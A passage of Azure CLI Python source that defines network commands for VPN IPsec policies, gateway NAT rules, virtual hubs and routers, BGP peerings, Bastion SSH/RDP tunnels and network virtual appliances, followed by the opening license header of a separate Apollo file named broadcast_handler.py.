ike_encryption, ike_integrity, dh_group, pfs_group, no_wait=False):
IpsecPolicy = cmd.get_models('IpsecPolicy')
new_policy = IpsecPolicy(sa_life_time_seconds=sa_life_time_seconds,
sa_data_size_kilobytes=sa_data_size_kilobytes,
ipsec_encryption=ipsec_encryption,
ipsec_integrity=ipsec_integrity,
ike_encryption=ike_encryption,
ike_integrity=ike_integrity,
dh_group=dh_group,
pfs_group=pfs_group)
conn = client.get(resource_group_name, connection_name)
if conn.ipsec_policies:
conn.ipsec_policies.append(new_policy)
else:
conn.ipsec_policies = [new_policy]
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, connection_name, conn)
def clear_vpn_conn_ipsec_policies(cmd, client, resource_group_name, connection_name, no_wait=False):
conn = client.get(resource_group_name, connection_name)
conn.ipsec_policies = None
conn.use_policy_based_traffic_selectors = False
if no_wait:
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, connection_name, conn)
from azure.cli.core.commands import LongRunningOperation
poller = sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, connection_name, conn)
return LongRunningOperation(cmd.cli_ctx)(poller).ipsec_policies
def list_vpn_conn_ipsec_policies(cmd, client, resource_group_name, connection_name):
return client.get(resource_group_name, connection_name).ipsec_policies
def assign_vnet_gateway_aad(cmd, resource_group_name, gateway_name,
aad_tenant, aad_audience, aad_issuer, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
if gateway.vpn_client_configuration is None:
raise CLIError('VPN client configuration must be set first through `az network vnet-gateway create/update`.')
gateway.vpn_client_configuration.aad_tenant = aad_tenant
gateway.vpn_client_configuration.aad_audience = aad_audience
gateway.vpn_client_configuration.aad_issuer = aad_issuer
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, gateway_name, gateway)
def show_vnet_gateway_aad(cmd, resource_group_name, gateway_name):
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
if gateway.vpn_client_configuration is None:
raise CLIError('VPN client configuration must be set first through `az network vnet-gateway create/update`.')
return gateway.vpn_client_configuration
def remove_vnet_gateway_aad(cmd, resource_group_name, gateway_name, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
if gateway.vpn_client_configuration is None:
raise CLIError('VPN client configuration must be set first through `az network vnet-gateway create/update`.')
gateway.vpn_client_configuration.aad_tenant = None
gateway.vpn_client_configuration.aad_audience = None
gateway.vpn_client_configuration.aad_issuer = None
if cmd.supported_api_version(min_api='2020-11-01'):
gateway.vpn_client_configuration.vpn_authentication_types = None
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, gateway_name, gateway)
def add_vnet_gateway_nat_rule(cmd, resource_group_name, gateway_name, name, internal_mappings, external_mappings,
rule_type=None, mode=None, ip_config_id=None, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
VirtualNetworkGatewayNatRule, VpnNatRuleMapping = cmd.get_models('VirtualNetworkGatewayNatRule',
'VpnNatRuleMapping')
gateway.nat_rules.append(
VirtualNetworkGatewayNatRule(type_properties_type=rule_type, mode=mode, name=name,
internal_mappings=[VpnNatRuleMapping(address_space=i_map) for i_map in internal_mappings] if internal_mappings else None,
external_mappings=[VpnNatRuleMapping(address_space=e_map) for e_map in external_mappings] if external_mappings else None,
ip_configuration_id=ip_config_id))
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, gateway_name, gateway)
def show_vnet_gateway_nat_rule(cmd, resource_group_name, gateway_name):
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
return gateway.nat_rules
def remove_vnet_gateway_nat_rule(cmd, resource_group_name, gateway_name, name, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
for rule in gateway.nat_rules:
if name == rule.name:
gateway.nat_rules.remove(rule)
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, gateway_name, gateway)
raise UnrecognizedArgumentError(f'Do not find nat_rules named {name}!!!')
# endregion
# region VirtualHub
def create_virtual_hub(cmd, client,
resource_group_name,
virtual_hub_name,
hosted_subnet,
public_ip_address=None,
location=None,
tags=None):
from azure.core.exceptions import HttpResponseError
from azure.cli.core.commands import LongRunningOperation
try:
client.get(resource_group_name, virtual_hub_name)
raise CLIError('The VirtualHub "{}" under resource group "{}" exists'.format(
virtual_hub_name, resource_group_name))
except HttpResponseError:
pass
SubResource = cmd.get_models('SubResource')
VirtualHub, HubIpConfiguration = cmd.get_models('VirtualHub', 'HubIpConfiguration')
hub = VirtualHub(tags=tags, location=location,
virtual_wan=None,
sku='Standard')
vhub_poller = client.begin_create_or_update(resource_group_name, virtual_hub_name, hub)
LongRunningOperation(cmd.cli_ctx)(vhub_poller)
ip_config = HubIpConfiguration(
subnet=SubResource(id=hosted_subnet),
public_ip_address=SubResource(id=public_ip_address) if public_ip_address else None,
)
vhub_ip_config_client = network_client_factory(cmd.cli_ctx).virtual_hub_ip_configuration
try:
vhub_ip_poller = vhub_ip_config_client.begin_create_or_update(
resource_group_name, virtual_hub_name, 'Default', ip_config)
LongRunningOperation(cmd.cli_ctx)(vhub_ip_poller)
except Exception as ex:
logger.error(ex)
try:
vhub_ip_config_client.begin_delete(resource_group_name, virtual_hub_name, 'Default')
except HttpResponseError:
pass
client.begin_delete(resource_group_name, virtual_hub_name)
raise ex
return client.get(resource_group_name, virtual_hub_name)
def virtual_hub_update_setter(client, resource_group_name, virtual_hub_name, parameters):
return client.begin_create_or_update(resource_group_name, virtual_hub_name, parameters)
def update_virtual_hub(cmd, instance,
tags=None,
allow_branch_to_branch_traffic=None):
with cmd.update_context(instance) as c:
c.set_param('tags', tags)
c.set_param('allow_branch_to_branch_traffic', allow_branch_to_branch_traffic)
return instance
def delete_virtual_hub(cmd, client, resource_group_name, virtual_hub_name, no_wait=False):
from azure.cli.core.commands import LongRunningOperation
vhub_ip_config_client = network_client_factory(cmd.cli_ctx).virtual_hub_ip_configuration
ip_configs = list(vhub_ip_config_client.list(resource_group_name, virtual_hub_name))
if ip_configs:
ip_config = ip_configs[0] # There will always be only 1
poller = vhub_ip_config_client.begin_delete(resource_group_name, virtual_hub_name, ip_config.name)
LongRunningOperation(cmd.cli_ctx)(poller)
return sdk_no_wait(no_wait, client.begin_delete, resource_group_name, virtual_hub_name)
def list_virtual_hub(client, resource_group_name=None):
if resource_group_name is not None:
return client.list_by_resource_group(resource_group_name)
return client.list()
def create_virtual_hub_bgp_connection(cmd, client, resource_group_name, virtual_hub_name, connection_name,
peer_asn, peer_ip, no_wait=False):
BgpConnection = cmd.get_models('BgpConnection')
vhub_bgp_conn = BgpConnection(name=connection_name, peer_asn=peer_asn, peer_ip=peer_ip)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name,
virtual_hub_name, connection_name, vhub_bgp_conn)
def virtual_hub_bgp_connection_update_setter(client, resource_group_name,
virtual_hub_name, connection_name,
parameters):
return client.begin_create_or_update(resource_group_name, virtual_hub_name, connection_name, parameters)
def update_virtual_hub_bgp_connection(cmd, instance, peer_asn=None, peer_ip=None):
with cmd.update_context(instance) as c:
c.set_param('peer_asn', peer_asn)
c.set_param('peer_ip', peer_ip)
return instance
def delete_virtual_hub_bgp_connection(client, resource_group_name,
virtual_hub_name, connection_name, no_wait=False):
return sdk_no_wait(no_wait, client.begin_delete, resource_group_name, virtual_hub_name, connection_name)
def list_virtual_hub_bgp_connection_learned_routes(client, resource_group_name, virtual_hub_name, connection_name):
return client.begin_list_learned_routes(resource_group_name, virtual_hub_name, connection_name)
def list_virtual_hub_bgp_connection_advertised_routes(client, resource_group_name, virtual_hub_name, connection_name):
return client.begin_list_advertised_routes(resource_group_name, virtual_hub_name, connection_name)
# endregion
# region VirtualRouter
def create_virtual_router(cmd,
resource_group_name,
virtual_router_name,
hosted_gateway=None,
hosted_subnet=None,
location=None,
tags=None):
vrouter_client = network_client_factory(cmd.cli_ctx).virtual_routers
vhub_client = network_client_factory(cmd.cli_ctx).virtual_hubs
from azure.core.exceptions import HttpResponseError
try:
vrouter_client.get(resource_group_name, virtual_router_name)
except HttpResponseError:
pass
virtual_hub_name = virtual_router_name
try:
vhub_client.get(resource_group_name, virtual_hub_name)
raise CLIError('The VirtualRouter "{}" under resource group "{}" exists'.format(virtual_hub_name,
resource_group_name))
except HttpResponseError:
pass
SubResource = cmd.get_models('SubResource')
# for old VirtualRouter
if hosted_gateway is not None:
VirtualRouter = cmd.get_models('VirtualRouter')
virtual_router = VirtualRouter(virtual_router_asn=None,
virtual_router_ips=[],
hosted_subnet=None,
hosted_gateway=SubResource(id=hosted_gateway),
location=location,
tags=tags)
return vrouter_client.begin_create_or_update(resource_group_name, virtual_router_name, virtual_router)
# for VirtualHub
VirtualHub, HubIpConfiguration = cmd.get_models('VirtualHub', 'HubIpConfiguration')
hub = VirtualHub(tags=tags, location=location, virtual_wan=None, sku='Standard')
ip_config = HubIpConfiguration(subnet=SubResource(id=hosted_subnet))
from azure.cli.core.commands import LongRunningOperation
vhub_poller = vhub_client.begin_create_or_update(resource_group_name, virtual_hub_name, hub)
LongRunningOperation(cmd.cli_ctx)(vhub_poller)
vhub_ip_config_client = network_client_factory(cmd.cli_ctx).virtual_hub_ip_configuration
try:
vhub_ip_poller = vhub_ip_config_client.begin_create_or_update(resource_group_name,
virtual_hub_name,
'Default',
ip_config)
LongRunningOperation(cmd.cli_ctx)(vhub_ip_poller)
except Exception as ex:
logger.error(ex)
vhub_ip_config_client.begin_delete(resource_group_name, virtual_hub_name, 'Default')
vhub_client.begin_delete(resource_group_name, virtual_hub_name)
raise ex
return vhub_client.get(resource_group_name, virtual_hub_name)
def virtual_router_update_getter(cmd, resource_group_name, virtual_router_name):
from azure.core.exceptions import HttpResponseError
try:
vrouter_client = network_client_factory(cmd.cli_ctx).virtual_routers
return vrouter_client.get(resource_group_name, virtual_router_name)
except HttpResponseError: # 404
pass
virtual_hub_name = virtual_router_name
vhub_client = network_client_factory(cmd.cli_ctx).virtual_hubs
return vhub_client.get(resource_group_name, virtual_hub_name)
def virtual_router_update_setter(cmd, resource_group_name, virtual_router_name, parameters):
if parameters.type == 'Microsoft.Network/virtualHubs':
client = network_client_factory(cmd.cli_ctx).virtual_hubs
else:
client = network_client_factory(cmd.cli_ctx).virtual_routers
# If the client is virtual_hubs,
# the virtual_router_name represents virtual_hub_name and
# the parameters represents VirtualHub
return client.begin_create_or_update(resource_group_name, virtual_router_name, parameters)
def update_virtual_router(cmd, instance, tags=None):
# both VirtualHub and VirtualRouter own those properties
with cmd.update_context(instance) as c:
c.set_param('tags', tags)
return instance
def list_virtual_router(cmd, resource_group_name=None):
vrouter_client = network_client_factory(cmd.cli_ctx).virtual_routers
vhub_client = network_client_factory(cmd.cli_ctx).virtual_hubs
if resource_group_name is not None:
vrouters = vrouter_client.list_by_resource_group(resource_group_name)
vhubs = vhub_client.list_by_resource_group(resource_group_name)
else:
vrouters = vrouter_client.list()
vhubs = vhub_client.list()
return list(vrouters) + list(vhubs)
def show_virtual_router(cmd, resource_group_name, virtual_router_name):
vrouter_client = network_client_factory(cmd.cli_ctx).virtual_routers
vhub_client = network_client_factory(cmd.cli_ctx).virtual_hubs
from azure.core.exceptions import HttpResponseError
try:
item = vrouter_client.get(resource_group_name, virtual_router_name)
except HttpResponseError:
virtual_hub_name = virtual_router_name
item = vhub_client.get(resource_group_name, virtual_hub_name)
return item
def delete_virtual_router(cmd, resource_group_name, virtual_router_name):
vrouter_client = network_client_factory(cmd.cli_ctx).virtual_routers
vhub_client = network_client_factory(cmd.cli_ctx).virtual_hubs
vhub_ip_config_client = network_client_factory(cmd.cli_ctx).virtual_hub_ip_configuration
from azure.core.exceptions import HttpResponseError
try:
vrouter_client.get(resource_group_name, virtual_router_name)
item = vrouter_client.begin_delete(resource_group_name, virtual_router_name)
except HttpResponseError:
from azure.cli.core.commands import LongRunningOperation
virtual_hub_name = virtual_router_name
poller = vhub_ip_config_client.begin_delete(resource_group_name, virtual_hub_name, 'Default')
LongRunningOperation(cmd.cli_ctx)(poller)
item = vhub_client.begin_delete(resource_group_name, virtual_hub_name)
return item
def create_virtual_router_peering(cmd, resource_group_name, virtual_router_name, peering_name, peer_asn, peer_ip):
# try VirtualRouter first
from azure.core.exceptions import HttpResponseError
try:
vrouter_client = network_client_factory(cmd.cli_ctx).virtual_routers
vrouter_client.get(resource_group_name, virtual_router_name)
except HttpResponseError:
pass
else:
vrouter_peering_client = network_client_factory(cmd.cli_ctx).virtual_router_peerings
VirtualRouterPeering = cmd.get_models('VirtualRouterPeering')
virtual_router_peering = VirtualRouterPeering(peer_asn=peer_asn, peer_ip=peer_ip)
return vrouter_peering_client.begin_create_or_update(resource_group_name,
virtual_router_name,
peering_name,
virtual_router_peering)
virtual_hub_name = virtual_router_name
bgp_conn_name = peering_name
# try VirtualHub then if the virtual router doesn't exist
try:
vhub_client = network_client_factory(cmd.cli_ctx).virtual_hubs
vhub_client.get(resource_group_name, virtual_hub_name)
except HttpResponseError:
msg = 'The VirtualRouter "{}" under resource group "{}" was not found'.format(virtual_hub_name,
resource_group_name)
raise CLIError(msg)
BgpConnection = cmd.get_models('BgpConnection')
vhub_bgp_conn = BgpConnection(name=peering_name, peer_asn=peer_asn, peer_ip=peer_ip)
vhub_bgp_conn_client = network_client_factory(cmd.cli_ctx).virtual_hub_bgp_connection
return vhub_bgp_conn_client.begin_create_or_update(resource_group_name, virtual_hub_name,
bgp_conn_name, vhub_bgp_conn)
def virtual_router_peering_update_getter(cmd, resource_group_name, virtual_router_name, peering_name):
vrouter_peering_client = network_client_factory(cmd.cli_ctx).virtual_router_peerings
from azure.core.exceptions import HttpResponseError
try:
return vrouter_peering_client.get(resource_group_name, virtual_router_name, peering_name)
except HttpResponseError: # 404
pass
virtual_hub_name = virtual_router_name
bgp_conn_name = peering_name
vhub_bgp_conn_client = network_client_factory(cmd.cli_ctx).virtual_hub_bgp_connection
return vhub_bgp_conn_client.get(resource_group_name, virtual_hub_name, bgp_conn_name)
def virtual_router_peering_update_setter(cmd, resource_group_name, virtual_router_name, peering_name, parameters):
if parameters.type == 'Microsoft.Network/virtualHubs/bgpConnections':
client = network_client_factory(cmd.cli_ctx).virtual_hub_bgp_connection
else:
client = network_client_factory(cmd.cli_ctx).virtual_router_peerings
# if the client is virtual_hub_bgp_connection,
# the virtual_router_name represents virtual_hub_name and
# the peering_name represents bgp_connection_name and
# the parameters represents BgpConnection
return client.begin_create_or_update(resource_group_name, virtual_router_name, peering_name, parameters)
def update_virtual_router_peering(cmd, instance, peer_asn=None, peer_ip=None):
# both VirtualHub and VirtualRouter own those properties
with cmd.update_context(instance) as c:
c.set_param('peer_asn', peer_asn)
c.set_param('peer_ip', peer_ip)
return instance
def list_virtual_router_peering(cmd, resource_group_name, virtual_router_name):
virtual_hub_name = virtual_router_name
from azure.core.exceptions import HttpResponseError
try:
vrouter_client = network_client_factory(cmd.cli_ctx).virtual_routers
vrouter_client.get(resource_group_name, virtual_router_name)
except HttpResponseError:
try:
vhub_client = network_client_factory(cmd.cli_ctx).virtual_hubs
vhub_client.get(resource_group_name, virtual_hub_name)
except HttpResponseError:
msg = 'The VirtualRouter "{}" under resource group "{}" was not found'.format(virtual_hub_name,
resource_group_name)
raise CLIError(msg)
try:
vrouter_peering_client = network_client_factory(cmd.cli_ctx).virtual_router_peerings
vrouter_peerings = list(vrouter_peering_client.list(resource_group_name, virtual_router_name))
except HttpResponseError:
vrouter_peerings = []
virtual_hub_name = virtual_router_name
try:
vhub_bgp_conn_client = network_client_factory(cmd.cli_ctx).virtual_hub_bgp_connections
vhub_bgp_connections = list(vhub_bgp_conn_client.list(resource_group_name, virtual_hub_name))
except HttpResponseError:
vhub_bgp_connections = []
return list(vrouter_peerings) + list(vhub_bgp_connections)
def show_virtual_router_peering(cmd, resource_group_name, virtual_router_name, peering_name):
from azure.core.exceptions import HttpResponseError
try:
vrouter_client = network_client_factory(cmd.cli_ctx).virtual_routers
vrouter_client.get(resource_group_name, virtual_router_name)
except HttpResponseError:
pass
else:
vrouter_peering_client = network_client_factory(cmd.cli_ctx).virtual_router_peerings
return vrouter_peering_client.get(resource_group_name, virtual_router_name, peering_name)
virtual_hub_name = virtual_router_name
bgp_conn_name = peering_name
# try VirtualHub then if the virtual router doesn't exist
try:
vhub_client = network_client_factory(cmd.cli_ctx).virtual_hubs
vhub_client.get(resource_group_name, virtual_hub_name)
except HttpResponseError:
msg = 'The VirtualRouter "{}" under resource group "{}" was not found'.format(virtual_hub_name,
resource_group_name)
raise CLIError(msg)
vhub_bgp_conn_client = network_client_factory(cmd.cli_ctx).virtual_hub_bgp_connection
return vhub_bgp_conn_client.get(resource_group_name, virtual_hub_name, bgp_conn_name)
def delete_virtual_router_peering(cmd, resource_group_name, virtual_router_name, peering_name):
from azure.core.exceptions import HttpResponseError
try:
vrouter_client = network_client_factory(cmd.cli_ctx).virtual_routers
vrouter_client.get(resource_group_name, virtual_router_name)
except: # pylint: disable=bare-except
pass
else:
vrouter_peering_client = network_client_factory(cmd.cli_ctx).virtual_router_peerings
return vrouter_peering_client.begin_delete(resource_group_name, virtual_router_name, peering_name)
virtual_hub_name = virtual_router_name
bgp_conn_name = peering_name
# try VirtualHub then if the virtual router doesn't exist
try:
vhub_client = network_client_factory(cmd.cli_ctx).virtual_hubs
vhub_client.get(resource_group_name, virtual_hub_name)
except HttpResponseError:
msg = 'The VirtualRouter "{}" under resource group "{}" was not found'.format(virtual_hub_name,
resource_group_name)
raise CLIError(msg)
vhub_bgp_conn_client = network_client_factory(cmd.cli_ctx).virtual_hub_bgp_connection
return vhub_bgp_conn_client.begin_delete(resource_group_name, virtual_hub_name, bgp_conn_name)
# endregion
# region service aliases
def list_service_aliases(cmd, location, resource_group_name=None):
client = network_client_factory(cmd.cli_ctx).available_service_aliases
if resource_group_name is not None:
return client.list_by_resource_group(resource_group_name=resource_group_name, location=location)
return client.list(location=location)
# endregion
# region bastion
def create_bastion_host(cmd, resource_group_name, bastion_host_name, virtual_network_name,
public_ip_address, location=None, subnet='AzureBastionSubnet', scale_units=None, sku=None, tags=None):
client = network_client_factory(cmd.cli_ctx).bastion_hosts
(BastionHost,
BastionHostIPConfiguration,
SubResource) = cmd.get_models('BastionHost',
'BastionHostIPConfiguration',
'SubResource')
ip_config_name = "bastion_ip_config"
ip_configuration = BastionHostIPConfiguration(name=ip_config_name,
subnet=SubResource(id=subnet),
public_ip_address=SubResource(id=public_ip_address))
bastion_host = BastionHost(ip_configurations=[ip_configuration],
location=location,
tags=tags)
if cmd.supported_api_version(min_api='2021-03-01'):
sku_type = cmd.get_models('Sku')
sku = sku_type(name=sku)
bastion_host = BastionHost(ip_configurations=[ip_configuration],
location=location,
scale_units=scale_units,
sku=sku,
tags=tags)
return client.begin_create_or_update(resource_group_name=resource_group_name,
bastion_host_name=bastion_host_name,
parameters=bastion_host)
def list_bastion_host(cmd, resource_group_name=None):
client = network_client_factory(cmd.cli_ctx).bastion_hosts
if resource_group_name is not None:
return client.list_by_resource_group(resource_group_name=resource_group_name)
return client.list()
SSH_EXTENSION_NAME = 'ssh'
SSH_EXTENSION_MODULE = 'azext_ssh.custom'
SSH_EXTENSION_VERSION = '0.1.3'
def _get_azext_module(extension_name, module_name):
try:
# Adding the installed extension in the path
from azure.cli.core.extension.operations import add_extension_to_path
add_extension_to_path(extension_name)
# Import the extension module
from importlib import import_module
azext_custom = import_module(module_name)
return azext_custom
except ImportError as ie:
raise CLIError(ie)
def _test_extension(extension_name):
from azure.cli.core.extension import (get_extension)
from pkg_resources import parse_version
ext = get_extension(extension_name)
if parse_version(ext.version) < parse_version(SSH_EXTENSION_VERSION):
raise CLIError('SSH Extension (version >= "{}") must be installed'.format(SSH_EXTENSION_VERSION))
def _get_ssh_path(ssh_command="ssh"):
import os
ssh_path = ssh_command
if platform.system() == 'Windows':
arch_data = platform.architecture()
is_32bit = arch_data[0] == '32bit'
sys_path = 'SysNative' if is_32bit else 'System32'
system_root = os.environ['SystemRoot']
system32_path = os.path.join(system_root, sys_path)
ssh_path = os.path.join(system32_path, "openSSH", (ssh_command + ".exe"))
logger.debug("Platform architecture: %s", str(arch_data))
logger.debug("System Root: %s", system_root)
logger.debug("Attempting to run ssh from path %s", ssh_path)
if not os.path.isfile(ssh_path):
raise CLIError("Could not find " + ssh_command + ".exe. Is the OpenSSH client installed?")
else:
raise UnrecognizedArgumentError("Platform is not supported for this command. Supported platforms: Windows")
return ssh_path
def _get_rdp_path(rdp_command="mstsc"):
import os
rdp_path = rdp_command
if platform.system() == 'Windows':
arch_data = platform.architecture()
sys_path = 'System32'
system_root = os.environ['SystemRoot']
system32_path = os.path.join(system_root, sys_path)
rdp_path = os.path.join(system32_path, (rdp_command + ".exe"))
logger.debug("Platform architecture: %s", str(arch_data))
logger.debug("System Root: %s", system_root)
logger.debug("Attempting to run rdp from path %s", rdp_path)
if not os.path.isfile(rdp_path):
raise CLIError("Could not find " + rdp_command + ".exe. Is the rdp client installed?")
else:
raise UnrecognizedArgumentError("Platform is not supported for this command. Supported platforms: Windows")
return rdp_path
def _get_host(username, ip):
return username + "@" + ip
def _build_args(cert_file, private_key_file):
private_key = []
certificate = []
if private_key_file:
private_key = ["-i", private_key_file]
if cert_file:
certificate = ["-o", "CertificateFile=" + cert_file]
return private_key + certificate
def ssh_bastion_host(cmd, auth_type, target_resource_id, resource_group_name, bastion_host_name, resource_port=None, username=None, ssh_key=None):
_test_extension(SSH_EXTENSION_NAME)
if not resource_port:
resource_port = 22
if not is_valid_resource_id(target_resource_id):
raise InvalidArgumentValueError("Please enter a valid Virtual Machine resource Id.")
tunnel_server = get_tunnel(cmd, resource_group_name, bastion_host_name, target_resource_id, resource_port)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
if auth_type.lower() == 'password':
if username is None:
raise RequiredArgumentMissingError("Please enter username with --username.")
command = [_get_ssh_path(), _get_host(username, 'localhost')]
elif auth_type.lower() == 'aad':
azssh = _get_azext_module(SSH_EXTENSION_NAME, SSH_EXTENSION_MODULE)
public_key_file, private_key_file = azssh._check_or_create_public_private_files(None, None) # pylint: disable=protected-access
cert_file, username = azssh._get_and_write_certificate(cmd, public_key_file, private_key_file + '-cert.pub') # pylint: disable=protected-access
command = [_get_ssh_path(), _get_host(username, 'localhost')]
command = command + _build_args(cert_file, private_key_file)
elif auth_type.lower() == 'ssh-key':
if username is None or ssh_key is None:
raise RequiredArgumentMissingError("Please enter username --username and ssh cert location --ssh-key.")
command = [_get_ssh_path(), _get_host(username, 'localhost')]
command = command + _build_args(None, ssh_key)
else:
raise UnrecognizedArgumentError("Unknown auth type. Use one of password, aad or ssh-key.")
command = command + ["-p", str(tunnel_server.local_port)]
command = command + ['-o', "StrictHostKeyChecking=no", '-o', "UserKnownHostsFile=/dev/null"]
command = command + ['-o', "LogLevel=Error"]
logger.debug("Running ssh command %s", ' '.join(command))
try:
subprocess.call(command, shell=platform.system() == 'Windows')
except Exception as ex:
raise CLIInternalError(ex)
def rdp_bastion_host(cmd, target_resource_id, resource_group_name, bastion_host_name, resource_port=None):
if not resource_port:
resource_port = 3389
if not is_valid_resource_id(target_resource_id):
raise InvalidArgumentValueError("Please enter a valid Virtual Machine resource Id.")
if platform.system() == 'Windows':
tunnel_server = get_tunnel(cmd, resource_group_name, bastion_host_name, target_resource_id, resource_port)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
command = [_get_rdp_path(), "/v:localhost:{0}".format(tunnel_server.local_port)]
logger.debug("Running rdp command %s", ' '.join(command))
from ._process_helper import launch_and_wait
launch_and_wait(command)
tunnel_server.cleanup()
else:
raise UnrecognizedArgumentError("Platform is not supported for this command. Supported platforms: Windows")
def get_tunnel(cmd, resource_group_name, name, vm_id, resource_port, port=None):
from .tunnel import TunnelServer
client = network_client_factory(cmd.cli_ctx).bastion_hosts
bastion = client.get(resource_group_name, name)
if port is None:
port = 0 # Will auto-select a free port from 1024-65535
tunnel_server = TunnelServer(cmd.cli_ctx, 'localhost', port, bastion, vm_id, resource_port)
return tunnel_server
def create_bastion_tunnel(cmd, target_resource_id, resource_group_name, bastion_host_name, resource_port, port, timeout=None):
if not is_valid_resource_id(target_resource_id):
raise InvalidArgumentValueError("Please enter a valid Virtual Machine resource Id.")
tunnel_server = get_tunnel(cmd, resource_group_name, bastion_host_name, target_resource_id, resource_port, port)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
logger.warning('Opening tunnel on port: %s', tunnel_server.local_port)
logger.warning('Tunnel is ready, connect on port %s', tunnel_server.local_port)
logger.warning('Ctrl + C to close')
if timeout:
time.sleep(int(timeout))
else:
while t.is_alive():
time.sleep(5)
def _start_tunnel(tunnel_server):
tunnel_server.start_server()
# endregion
# region security partner provider
def create_security_partner_provider(cmd, resource_group_name, security_partner_provider_name,
security_provider_name, virtual_hub, location=None, tags=None):
client = network_client_factory(cmd.cli_ctx).security_partner_providers
SecurityPartnerProvider, SubResource = cmd.get_models('SecurityPartnerProvider', 'SubResource')
security_partner_provider = SecurityPartnerProvider(security_provider_name=security_provider_name,
virtual_hub=SubResource(id=virtual_hub),
location=location,
tags=tags)
return client.begin_create_or_update(resource_group_name=resource_group_name,
security_partner_provider_name=security_partner_provider_name,
parameters=security_partner_provider)
def update_security_partner_provider(instance, cmd, security_provider_name=None, virtual_hub=None, tags=None):
with cmd.update_context(instance) as c:
c.set_param('security_provider_name', security_provider_name)
c.set_param('virtual_hub', virtual_hub)
c.set_param('tags', tags)
return instance
def list_security_partner_provider(cmd, resource_group_name=None):
client = network_client_factory(cmd.cli_ctx).security_partner_providers
if resource_group_name is not None:
return client.list_by_resource_group(resource_group_name=resource_group_name)
return client.list()
# endregion
# region network gateway connection
def reset_shared_key(cmd, client, virtual_network_gateway_connection_name, key_length, resource_group_name=None):
ConnectionResetSharedKey = cmd.get_models('ConnectionResetSharedKey')
shared_key = ConnectionResetSharedKey(key_length=key_length)
return client.begin_reset_shared_key(resource_group_name=resource_group_name,
virtual_network_gateway_connection_name=virtual_network_gateway_connection_name, # pylint: disable=line-too-long
parameters=shared_key)
def update_shared_key(cmd, instance, value):
with cmd.update_context(instance) as c:
c.set_param('value', value)
return instance
# endregion
# region network virtual appliance
def create_network_virtual_appliance(cmd, client, resource_group_name, network_virtual_appliance_name,
vendor, bundled_scale_unit, market_place_version,
virtual_hub, boot_strap_configuration_blobs=None,
cloud_init_configuration_blobs=None,
cloud_init_configuration=None, asn=None,
location=None, tags=None, no_wait=False):
(NetworkVirtualAppliance,
SubResource,
VirtualApplianceSkuProperties) = cmd.get_models('NetworkVirtualAppliance',
'SubResource',
'VirtualApplianceSkuProperties')
virtual_appliance = NetworkVirtualAppliance(boot_strap_configuration_blobs=boot_strap_configuration_blobs,
cloud_init_configuration_blobs=cloud_init_configuration_blobs,
cloud_init_configuration=cloud_init_configuration,
virtual_appliance_asn=asn,
virtual_hub=SubResource(id=virtual_hub),
nva_sku=VirtualApplianceSkuProperties(
vendor=vendor,
bundled_scale_unit=bundled_scale_unit,
market_place_version=market_place_version
),
location=location,
tags=tags)
return sdk_no_wait(no_wait, client.begin_create_or_update,
resource_group_name, network_virtual_appliance_name, virtual_appliance)
def update_network_virtual_appliance(instance, cmd, cloud_init_configuration=None, asn=None):
with cmd.update_context(instance) as c:
c.set_param('virtual_appliance_asn', asn)
c.set_param('cloud_init_configuration', cloud_init_configuration)
return instance
def list_network_virtual_appliance(cmd, client, resource_group_name=None):
if resource_group_name:
return client.list_by_resource_group(resource_group_name=resource_group_name)
return client.list()
def create_network_virtual_appliance_site(cmd, client, resource_group_name, network_virtual_appliance_name,
site_name, address_prefix, allow=None, optimize=None, default=None,
no_wait=False):
(BreakOutCategoryPolicies,
Office365PolicyProperties,
VirtualApplianceSite) = cmd.get_models('BreakOutCategoryPolicies',
'Office365PolicyProperties',
'VirtualApplianceSite')
virtual_appliance_site = VirtualApplianceSite(address_prefix=address_prefix,
o365_policy=Office365PolicyProperties(
break_out_categories=BreakOutCategoryPolicies(
allow=allow,
optimize=optimize,
default=default
)))
return sdk_no_wait(no_wait, client.begin_create_or_update,
resource_group_name, network_virtual_appliance_name, site_name, virtual_appliance_site)
def update_network_virtual_appliance_site(instance, cmd, address_prefix, allow=None, optimize=None, default=None):
with cmd.update_context(instance) as c:
c.set_param('address_prefix', address_prefix)
c.set_param('o365_policy.break_out_categories.allow', allow)
c.set_param('o365_policy.break_out_categories.optimize', optimize)
c.set_param('o365_policy.break_out_categories.default', default)
return instance
# endregion
|
broadcast_handler.py
|
# Software License Agreement (BSD License)
#
# Copyright (c) 2017, The Apollo Authors.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Willow Garage, Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
